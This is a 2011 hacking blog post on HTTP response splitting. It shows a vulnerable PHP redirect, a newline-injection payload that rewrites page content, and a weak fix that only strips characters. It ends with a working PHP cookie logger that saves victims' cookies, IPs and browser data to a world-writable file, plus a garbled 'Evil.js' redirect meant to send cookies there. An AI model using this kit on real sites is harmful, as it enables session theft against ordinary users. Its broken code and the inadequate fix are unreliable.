Search This Blog

Thursday, March 3, 2011

HTTP Response Splitting

HRS, although not a common practice amongst the hacking community, is rather taboo, yet one of the more popular and holds the most dangerous capabilities of Cross-Site Scripting. With it, you can modify or create your own headers to do any of the following: Redirect, Spoof Request Data (POST or GET), Spoof UserAgent, Spoof Referrer, Change your IP, change the information on a webpage, replace a webpage with only specified text. You can even use it to brute force a website. Although you'd need to create a script to loop the request Var yourself.

An example of an HRS vulnerable script would be the following:

< ? header("Location: ".$_GET['url']);? >

This is what is most commonly exploited in HRS. The location. Most sites (ones who want hits and popularity), would rather have links go to other pages with their site into the referrer. Mostly for popularity, hits, advertising etc..
The worst part about this script is the fact that it is un-sanitized. You can easily modify the header to do whatever you want. An easy way to check if it is vulnerable is by placing this in the ?url= variable.
0AContent-Length: 13%0A%
0AKr3w was here
The %0A is the hex value for \n or a new line escape character. This will replace all the text on the webpage with "Kr3w was here".

The possibilities with what a hacker can do with this are seemingly endless. A way to fix this is by simply replacing all % characters in the header.

< ?php $loc = $_GET['url']; $loc = str_ireplace("%","",$ loc); $loc = str_ireplace("\n","",$ loc); $loc = str_ireplace("\\n","", $ loc); header("Location: ".$loc); ? >

Scripts and Syntax for the Log.php and Evil.js:

document. location="http://
+"& redirect=http://
page.php" ;

< ?php / * ** Kr3w's Cookie Logger * / $ip = $_SERVER['REMOTE_ ADDR']; $cookie = $_GET['cookie']; $referer = $_SERVER['HTTP_ REFERER']; $browser = $_SERVER['HTTP_ USER_AGENT']; $ redirect = $_GET['redirect']; $data = "IP: " . $ip . "\n" ."Cookie: " . $cookie . "\n" ."Referrer: " . $referer . "\n" ."Browser: " . $browser . "\n \n"; $log = "cookies.txt"; @chmod($log, 0777); $f = fopen($log, 'a'); fwrite($f, $data); fclose($f); @header("Location: $ redirect"); ? >

Back to Main Content